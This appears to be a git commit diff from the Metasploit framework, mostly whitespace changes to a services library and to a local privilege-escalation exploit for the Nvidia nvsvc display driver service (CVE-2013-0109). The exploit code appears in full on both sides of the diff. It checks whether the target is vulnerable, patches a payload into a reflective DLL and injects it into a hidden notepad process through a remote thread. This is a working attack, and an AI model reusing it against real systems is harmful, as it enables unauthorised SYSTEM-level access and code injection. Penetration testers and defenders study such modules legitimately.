Conflicts:
	lib/msf/core/post/windows/services.rb
bug/bundler_fix
Meatballs 2013-07-05 22:35:22 +01:00
parent 5eca4714c2
commit 819ba30a33
2 changed files with 53 additions and 53 deletions


@ -292,7 +292,7 @@ module Services
# Now to grab a handle to the service.
# Thank you, Wine project for defining the DELETE constant since it,
# and all its friends, are missing from the MSDN docs.
# #define DELETE 0x00010000
# #define DELETE 0x00010000
handle = adv.OpenServiceA(manager, name, 0x10000)
if (handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
@ -312,7 +312,7 @@ module Services
#
# @param (see #service_start)
#
# @return {} representing lpServiceStatus
# @return {} representing lpServiceStatus
#
# @raise (see #service_start)
#


@ -22,40 +22,40 @@ class Metasploit3 < Msf::Exploit::Local
def initialize(info={})
super(update_info(info, {
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
'Description' => %q{
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
'Description' => %q{
The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can
interact with the service. The service has a stacked based buffer overflow as a result
of a memmove operation.
N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr!
This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012.
},
'License' => MSF_LICENSE,
'Author' =>
'License' => MSF_LICENSE,
'Author' =>
[
'Peter Wintersmith', # Original exploit
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
],
'Arch' => ARCH_X86_64,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'Arch' => ARCH_X86_64,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
'Targets' =>
[
[ 'Automatic', { } ]
],
'Payload' =>
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'References' =>
'References' =>
[
[ 'CVE', '2013-0109' ],
[ 'OSVDB', '88745' ],
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Local
rescue RuntimeError => e
print_error("Unable to retrieve service status")
end
if sysinfo['Architecture'] =~ /WOW64/i
# Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!)
return Exploit::CheckCode::Detected
else
path = svc['Command'].strip
end
begin
hash = client.fs.file.md5(path).unpack('H*').first
rescue Rex::Post::Meterpreter::RequestError => e
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Local
if vuln_hashes.include?(hash)
vprint_good("Hash '#{hash}' is listed as vulnerable")
return Exploit::CheckCode::Vulnerable
else
else
vprint_status("Hash '#{hash}' is not recorded as vulnerable")
return Exploit::CheckCode::Detected
end
@ -115,20 +115,20 @@ class Metasploit3 < Msf::Exploit::Local
end
end
def create_proc
windir = expand_path("%windir%")
cmd = "#{windir}\\system32\\notepad.exe"
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
end
def create_proc
windir = expand_path("%windir%")
cmd = "#{windir}\\system32\\notepad.exe"
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
end
def is_running?
begin
status = service_status('nvsvc')
begin
status = service_status('nvsvc')
return (status and status[:state] == 4)
rescue RuntimeError => e
print_error("Unable to retrieve service status")
rescue RuntimeError => e
print_error("Unable to retrieve service status")
return false
end
end
end
@ -147,40 +147,40 @@ class Metasploit3 < Msf::Exploit::Local
else
print_good("Service is running")
end
dll = ''
offset = nil
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
pay = payload.encoded
dll = ''
offset = nil
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
bo = dll.index('PAYLOAD:')
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
dll[bo, pay.length] = [pay].pack("a*")
pay = payload.encoded
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
bo = dll.index('PAYLOAD:')
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
dll[bo, pay.length] = [pay].pack("a*")
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
print_error("No offset found") unless offset
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
new_pid = create_proc
print_error("No offset found") unless offset
if not new_pid
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
end
new_pid = create_proc
vprint_status("Injecting payload into memory")
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
host_process.memory.protect(mem)
host_process.memory.write(mem, dll)
if not new_pid
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
end
vprint_status("Injecting payload into memory")
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
host_process.memory.protect(mem)
host_process.memory.write(mem, dll)
print_status("Executing exploit...")
host_process.thread.create(mem+offset)
end